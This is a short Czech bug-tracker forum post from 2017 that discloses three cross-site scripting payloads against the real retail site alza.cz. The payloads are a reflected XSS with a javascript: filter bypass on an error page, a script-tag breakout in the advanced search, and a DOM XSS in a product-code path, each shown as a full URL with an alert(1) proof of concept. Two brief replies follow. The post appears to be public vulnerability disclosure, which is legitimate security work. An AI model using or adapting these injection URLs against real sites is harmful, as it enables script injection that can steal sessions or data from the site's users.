Multiple XSS na Alza.cz

BugTrack

Multiple XSS na Alza.cz#
1. Reflected XSS with user interaction (filter bypass):
[link]
alza.cz/Error500.aspx?scripterrorpath=javas
cript:javascript:alert(1)


2. Dom based XSS with user interaction:
[link]
alza.cz/SearchAdvanced.asp?pg=1&CatId=0
&EXPS=a&EXPS=xss');alert(1);</sc
ript>

^ Po otevreni kliknout na tlacitko Hledat

3. Dom based XSS!
[link]
alza.cz/kod/SAMO0130a;xss'-alert(1)-'
(odpovědět)
Sinxteniyn | 92.222.79.*3.5.2017 18:24
re: Multiple XSS na Alza.cz#
Hezké, moc hezké :)
(odpovědět)
David1234 | 88.103.77.*6.5.2017 19:55

Zpět
 
 
 

 
BBCode